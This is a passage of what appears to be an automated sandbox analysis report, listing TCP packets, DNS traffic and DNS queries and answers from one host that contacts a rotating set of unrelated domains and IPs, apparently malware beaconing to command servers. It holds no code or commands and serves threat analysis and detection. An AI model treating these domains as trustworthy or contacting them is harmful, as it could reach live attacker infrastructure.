                                                                                      Oct 16, 2023 11:27:48.313925028 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313971043 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314018011 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314076900 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314078093 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314136982 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314214945 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314301968 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314330101 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314373016 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314373970 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314399958 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314426899 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314462900 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314483881 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314490080 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314513922 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314532995 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314630032 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314671040 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314745903 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314795971 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314799070 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314866066 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314881086 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314934969 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314955950 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314990044 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.315023899 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.315026999 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.315053940 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.315082073 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.315109015 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.315126896 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.315347910 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.672399044 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.672493935 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.672561884 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.672580957 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.672683954 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.672753096 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.672770023 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.672838926 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.672868013 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.672930956 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.672966003 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673048973 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673067093 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673161030 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673204899 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673250914 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673269987 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673352957 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673360109 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673437119 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673458099 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673523903 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673571110 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673620939 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673692942 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673799992 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673804045 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673861980 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673903942 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673984051 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673994064 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674069881 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674082994 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674174070 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674245119 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674253941 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674339056 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674344063 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674407959 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674436092 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674513102 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674524069 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674602985 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674618006 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674721003 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674772978 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:52.378097057 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:52.378310919 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:28:42.846146107 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:29:12.941868067 CEST5012780192.168.11.30104.21.19.227
                                                                                      Oct 16, 2023 11:29:13.108045101 CEST8050127104.21.19.227192.168.11.30
                                                                                      Oct 16, 2023 11:29:13.108350992 CEST5012780192.168.11.30104.21.19.227
                                                                                      Oct 16, 2023 11:29:13.108417034 CEST5012780192.168.11.30104.21.19.227
                                                                                      Oct 16, 2023 11:29:13.274713039 CEST8050127104.21.19.227192.168.11.30
                                                                                      Oct 16, 2023 11:29:13.284326077 CEST8050127104.21.19.227192.168.11.30
                                                                                      Oct 16, 2023 11:29:13.284408092 CEST8050127104.21.19.227192.168.11.30
                                                                                      Oct 16, 2023 11:29:13.284780025 CEST5012780192.168.11.30104.21.19.227
                                                                                      Oct 16, 2023 11:29:13.284847021 CEST5012780192.168.11.30104.21.19.227
                                                                                      Oct 16, 2023 11:29:13.451172113 CEST8050127104.21.19.227192.168.11.30
                                                                                      Oct 16, 2023 11:29:33.471681118 CEST5012880192.168.11.30172.67.148.68
                                                                                      Oct 16, 2023 11:29:33.638051987 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:33.638444901 CEST5012880192.168.11.30172.67.148.68
                                                                                      Oct 16, 2023 11:29:33.638444901 CEST5012880192.168.11.30172.67.148.68
                                                                                      Oct 16, 2023 11:29:33.804574966 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:34.123421907 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:34.123528004 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:34.123585939 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:34.123644114 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:34.123694897 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:34.123975992 CEST5012880192.168.11.30172.67.148.68
                                                                                      Oct 16, 2023 11:29:34.123976946 CEST5012880192.168.11.30172.67.148.68
                                                                                      Oct 16, 2023 11:29:34.124068975 CEST5012880192.168.11.30172.67.148.68
                                                                                      Oct 16, 2023 11:29:52.752248049 CEST5012980192.168.11.30103.224.212.210
                                                                                      Oct 16, 2023 11:29:52.921561956 CEST8050129103.224.212.210192.168.11.30
                                                                                      Oct 16, 2023 11:29:52.922079086 CEST5012980192.168.11.30103.224.212.210
                                                                                      Oct 16, 2023 11:29:52.922185898 CEST5012980192.168.11.30103.224.212.210
                                                                                      Oct 16, 2023 11:29:53.120343924 CEST8050129103.224.212.210192.168.11.30
                                                                                      Oct 16, 2023 11:29:53.120412111 CEST8050129103.224.212.210192.168.11.30
                                                                                      Oct 16, 2023 11:29:53.120686054 CEST5012980192.168.11.30103.224.212.210
                                                                                      Oct 16, 2023 11:29:53.120770931 CEST5012980192.168.11.30103.224.212.210
                                                                                      Oct 16, 2023 11:29:53.290122032 CEST8050129103.224.212.210192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.174237967 CEST5013080192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:30:34.341244936 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.341509104 CEST5013080192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:30:34.341609955 CEST5013080192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:30:34.508002043 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520132065 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520214081 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520272017 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520325899 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520369053 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520416021 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520821095 CEST5013080192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:30:34.520822048 CEST5013080192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:30:34.520822048 CEST5013080192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:15.587549925 CEST5013380192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:15.753714085 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.754112005 CEST5013380192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:15.754112005 CEST5013380192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:15.920314074 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.928987980 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.929069042 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.929342031 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.929372072 CEST5013380192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:15.929415941 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.929462910 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.929512978 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.929775953 CEST5013380192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:15.929838896 CEST5013380192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:36.336205006 CEST5013480192.168.11.3066.96.162.133
                                                                                      Oct 16, 2023 11:31:36.580095053 CEST805013466.96.162.133192.168.11.30
                                                                                      Oct 16, 2023 11:31:36.580255985 CEST5013480192.168.11.3066.96.162.133
                                                                                      Oct 16, 2023 11:31:36.580336094 CEST5013480192.168.11.3066.96.162.133
                                                                                      Oct 16, 2023 11:31:36.829097986 CEST805013466.96.162.133192.168.11.30
                                                                                      Oct 16, 2023 11:31:36.878046989 CEST805013466.96.162.133192.168.11.30
                                                                                      Oct 16, 2023 11:31:36.878109932 CEST805013466.96.162.133192.168.11.30
                                                                                      Oct 16, 2023 11:31:36.878415108 CEST5013480192.168.11.3066.96.162.133
                                                                                      Oct 16, 2023 11:31:36.878492117 CEST5013480192.168.11.3066.96.162.133
                                                                                      Oct 16, 2023 11:31:37.121778965 CEST805013466.96.162.133192.168.11.30
                                                                                      Oct 16, 2023 11:31:56.959136963 CEST5013580192.168.11.30104.247.82.90
                                                                                      Oct 16, 2023 11:31:57.201375008 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:57.201601028 CEST5013580192.168.11.30104.247.82.90
                                                                                      Oct 16, 2023 11:31:57.443955898 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:57.444381952 CEST5013580192.168.11.30104.247.82.90
                                                                                      Oct 16, 2023 11:31:57.686641932 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:57.686768055 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:57.686866045 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:57.687237978 CEST5013580192.168.11.30104.247.82.90
                                                                                      Oct 16, 2023 11:31:57.687238932 CEST5013580192.168.11.30104.247.82.90
                                                                                      Oct 16, 2023 11:31:57.894397974 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:57.894714117 CEST5013580192.168.11.30104.247.82.90
                                                                                      Oct 16, 2023 11:31:57.929636955 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:58.136936903 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:32:58.954741955 CEST5013880192.168.11.303.33.130.190
                                                                                      Oct 16, 2023 11:32:59.120436907 CEST80501383.33.130.190192.168.11.30
                                                                                      Oct 16, 2023 11:32:59.120702982 CEST5013880192.168.11.303.33.130.190
                                                                                      Oct 16, 2023 11:32:59.120800018 CEST5013880192.168.11.303.33.130.190
                                                                                      Oct 16, 2023 11:32:59.286645889 CEST80501383.33.130.190192.168.11.30
                                                                                      Oct 16, 2023 11:32:59.352847099 CEST80501383.33.130.190192.168.11.30
                                                                                      Oct 16, 2023 11:32:59.352922916 CEST80501383.33.130.190192.168.11.30
                                                                                      Oct 16, 2023 11:32:59.353420973 CEST5013880192.168.11.303.33.130.190
                                                                                      Oct 16, 2023 11:32:59.353420973 CEST5013880192.168.11.303.33.130.190
                                                                                      Oct 16, 2023 11:32:59.366880894 CEST80501383.33.130.190192.168.11.30
                                                                                      Oct 16, 2023 11:32:59.367155075 CEST5013880192.168.11.303.33.130.190
                                                                                      Oct 16, 2023 11:32:59.519355059 CEST80501383.33.130.190192.168.11.30
                                                                                      Oct 16, 2023 11:33:40.365722895 CEST5014180192.168.11.30172.67.193.177
                                                                                      Oct 16, 2023 11:33:40.532143116 CEST8050141172.67.193.177192.168.11.30
                                                                                      Oct 16, 2023 11:33:40.532452106 CEST5014180192.168.11.30172.67.193.177
                                                                                      Oct 16, 2023 11:33:40.532597065 CEST5014180192.168.11.30172.67.193.177
                                                                                      Oct 16, 2023 11:33:40.698848009 CEST8050141172.67.193.177192.168.11.30
                                                                                      Oct 16, 2023 11:33:40.708460093 CEST8050141172.67.193.177192.168.11.30
                                                                                      Oct 16, 2023 11:33:40.708920002 CEST5014180192.168.11.30172.67.193.177
                                                                                      Oct 16, 2023 11:33:40.708993912 CEST8050141172.67.193.177192.168.11.30
                                                                                      Oct 16, 2023 11:33:40.709207058 CEST5014180192.168.11.30172.67.193.177
                                                                                      Oct 16, 2023 11:33:40.875315905 CEST8050141172.67.193.177192.168.11.30
                                                                                      Oct 16, 2023 11:34:01.100727081 CEST5014280192.168.11.30104.247.82.51
                                                                                      Oct 16, 2023 11:34:01.342865944 CEST8050142104.247.82.51192.168.11.30
                                                                                      Oct 16, 2023 11:34:01.343070030 CEST5014280192.168.11.30104.247.82.51
                                                                                      Oct 16, 2023 11:34:01.585756063 CEST8050142104.247.82.51192.168.11.30
                                                                                      Oct 16, 2023 11:34:01.586007118 CEST5014280192.168.11.30104.247.82.51
                                                                                      Oct 16, 2023 11:34:01.828356981 CEST8050142104.247.82.51192.168.11.30
                                                                                      Oct 16, 2023 11:34:01.828512907 CEST8050142104.247.82.51192.168.11.30
                                                                                      Oct 16, 2023 11:34:01.828526020 CEST8050142104.247.82.51192.168.11.30
                                                                                      Oct 16, 2023 11:34:01.828980923 CEST5014280192.168.11.30104.247.82.51
                                                                                      Oct 16, 2023 11:34:01.828996897 CEST5014280192.168.11.30104.247.82.51
                                                                                      Oct 16, 2023 11:34:02.031711102 CEST8050142104.247.82.51192.168.11.30
                                                                                      Oct 16, 2023 11:34:02.031938076 CEST5014280192.168.11.30104.247.82.51
                                                                                      Oct 16, 2023 11:34:02.071779013 CEST8050142104.247.82.51192.168.11.30
                                                                                      Oct 16, 2023 11:34:02.274461031 CEST8050142104.247.82.51192.168.11.30
                                                                                      Oct 16, 2023 11:34:21.819355011 CEST5014680192.168.11.30208.91.197.27
                                                                                      Oct 16, 2023 11:34:22.055051088 CEST8050146208.91.197.27192.168.11.30
                                                                                      Oct 16, 2023 11:34:22.055357933 CEST5014680192.168.11.30208.91.197.27
                                                                                      Oct 16, 2023 11:34:22.055358887 CEST5014680192.168.11.30208.91.197.27
                                                                                      Oct 16, 2023 11:34:22.335223913 CEST8050146208.91.197.27192.168.11.30
                                                                                      Oct 16, 2023 11:34:22.340970993 CEST8050146208.91.197.27192.168.11.30
                                                                                      Oct 16, 2023 11:34:22.341447115 CEST5014680192.168.11.30208.91.197.27
                                                                                      Oct 16, 2023 11:34:22.341447115 CEST5014680192.168.11.30208.91.197.27
                                                                                      Oct 16, 2023 11:34:22.542505980 CEST8050146208.91.197.27192.168.11.30
                                                                                      Oct 16, 2023 11:34:22.542903900 CEST5014680192.168.11.30208.91.197.27
                                                                                      Oct 16, 2023 11:34:22.577248096 CEST8050146208.91.197.27192.168.11.30
                                                                                      Oct 16, 2023 11:34:44.146018982 CEST5014780192.168.11.30172.67.210.176
                                                                                      Oct 16, 2023 11:34:44.312604904 CEST8050147172.67.210.176192.168.11.30
                                                                                      Oct 16, 2023 11:34:44.313075066 CEST5014780192.168.11.30172.67.210.176
                                                                                      Oct 16, 2023 11:34:44.313076019 CEST5014780192.168.11.30172.67.210.176
                                                                                      Oct 16, 2023 11:34:44.479768991 CEST8050147172.67.210.176192.168.11.30
                                                                                      Oct 16, 2023 11:34:44.818830967 CEST5014780192.168.11.30172.67.210.176
                                                                                      Oct 16, 2023 11:34:44.985645056 CEST8050147172.67.210.176192.168.11.30
                                                                                      Oct 16, 2023 11:34:44.986042023 CEST5014780192.168.11.30172.67.210.176

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 16, 2023 11:26:43.845520020 CEST5631253192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:29:12.770318985 CEST5122653192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:29:12.940845966 CEST53512261.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:29:33.045984983 CEST5817653192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:29:33.470616102 CEST53581761.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:29:52.572699070 CEST5768253192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:29:52.751010895 CEST53576821.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:30:33.908983946 CEST5788153192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:30:34.173155069 CEST53578811.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:30:54.607141018 CEST5430853192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:30:54.831906080 CEST53543081.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:30:57.452284098 CEST6535053192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:31:15.319724083 CEST5466953192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:31:15.586316109 CEST53546691.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:31:36.018126011 CEST5667953192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:31:36.334717035 CEST53566791.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:31:56.716643095 CEST5100253192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:31:56.958108902 CEST53510021.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:32:17.430710077 CEST5863553192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:32:17.615190029 CEST53586351.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:32:17.615650892 CEST5863553192.168.11.309.9.9.9
                                                                                      Oct 16, 2023 11:32:17.799532890 CEST53586359.9.9.9192.168.11.30
                                                                                      Oct 16, 2023 11:32:38.160223961 CEST5990653192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:32:38.329014063 CEST53599061.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:32:58.780879021 CEST5686753192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:32:58.953659058 CEST53568671.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:33:05.688920021 CEST6519153192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:33:19.494623899 CEST6053453192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:33:20.207951069 CEST53605341.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:33:20.208547115 CEST6053453192.168.11.309.9.9.9
                                                                                      Oct 16, 2023 11:33:21.212634087 CEST6053453192.168.11.309.9.9.9
                                                                                      Oct 16, 2023 11:33:22.198084116 CEST53605349.9.9.9192.168.11.30
                                                                                      Oct 16, 2023 11:33:22.758809090 CEST53605349.9.9.9192.168.11.30
                                                                                      Oct 16, 2023 11:33:40.193209887 CEST4931753192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:33:40.364479065 CEST53493171.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:34:00.875941992 CEST5121053192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:34:01.098836899 CEST53512101.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:34:09.782591105 CEST5736653192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:34:21.574482918 CEST5039453192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:34:21.818440914 CEST53503941.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:34:43.975584984 CEST5314853192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:34:44.144838095 CEST53531481.1.1.1192.168.11.30
                                                                                      Oct 16, 2023 11:35:03.049592972 CEST6254353192.168.11.301.1.1.1
                                                                                      Oct 16, 2023 11:35:03.222152948 CEST53625431.1.1.1192.168.11.30

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Oct 16, 2023 11:26:43.845520020 CEST192.168.11.301.1.1.10x9039Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:29:12.770318985 CEST192.168.11.301.1.1.10xa5eaStandard query (0)www.juara102-azura.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:29:33.045984983 CEST192.168.11.301.1.1.10x9194Standard query (0)www.fftsxxx.topA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:29:52.572699070 CEST192.168.11.301.1.1.10x5172Standard query (0)www.nightoracle.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:30:33.908983946 CEST192.168.11.301.1.1.10x839bStandard query (0)www.thesoftwarepractitioner.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:30:54.607141018 CEST192.168.11.301.1.1.10x4290Standard query (0)www.jwilkinsartscapeinc.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:30:57.452284098 CEST192.168.11.301.1.1.10xac15Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:31:15.319724083 CEST192.168.11.301.1.1.10x2762Standard query (0)www.laserhairremovalkit.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:31:36.018126011 CEST192.168.11.301.1.1.10xe61fStandard query (0)www.omarshafie.onlineA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:31:56.716643095 CEST192.168.11.301.1.1.10xbea6Standard query (0)www.electric-cars-19095.bondA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:32:17.430710077 CEST192.168.11.301.1.1.10x605aStandard query (0)www.kzjsm.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:32:17.615650892 CEST192.168.11.309.9.9.90x605aStandard query (0)www.kzjsm.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:32:38.160223961 CEST192.168.11.301.1.1.10x212eStandard query (0)www.calm-plants.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:32:58.780879021 CEST192.168.11.301.1.1.10xcb09Standard query (0)www.latitudeinformatics.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:33:05.688920021 CEST192.168.11.301.1.1.10x85Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:33:19.494623899 CEST192.168.11.301.1.1.10x1382Standard query (0)www.metaastrologia.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:33:20.208547115 CEST192.168.11.309.9.9.90x1382Standard query (0)www.metaastrologia.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:33:21.212634087 CEST192.168.11.309.9.9.90x1382Standard query (0)www.metaastrologia.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:33:40.193209887 CEST192.168.11.301.1.1.10x5d3bStandard query (0)www.hdlive7.liveA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:34:00.875941992 CEST192.168.11.301.1.1.10xb12aStandard query (0)www.robertjamesfineclothing.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:34:09.782591105 CEST192.168.11.301.1.1.10x5edStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:34:21.574482918 CEST192.168.11.301.1.1.10x48ebStandard query (0)www.practicaloutsource.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:34:43.975584984 CEST192.168.11.301.1.1.10x6e1Standard query (0)www.mtauratarnt.comA (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:35:03.049592972 CEST192.168.11.301.1.1.10xe6caStandard query (0)www.wgardsgm.liveA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Oct 16, 2023 11:26:44.012439966 CEST1.1.1.1192.168.11.300x9039No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Oct 16, 2023 11:29:12.940845966 CEST1.1.1.1192.168.11.300xa5eaNo error (0)www.juara102-azura.com104.21.19.227A (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:29:12.940845966 CEST1.1.1.1192.168.11.300xa5eaNo error (0)www.juara102-azura.com172.67.190.111A (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:29:33.470616102 CEST1.1.1.1192.168.11.300x9194No error (0)www.fftsxxx.top172.67.148.68A (IP address)IN (0x0001)false
                                                                                      Oct 16, 2023 11:29:33.470616102 CEST1.1.1.1192.168.11.300x9194No error (0)www.fftsxxx.top104.21.39.189A (IP address)IN (0x0001)false
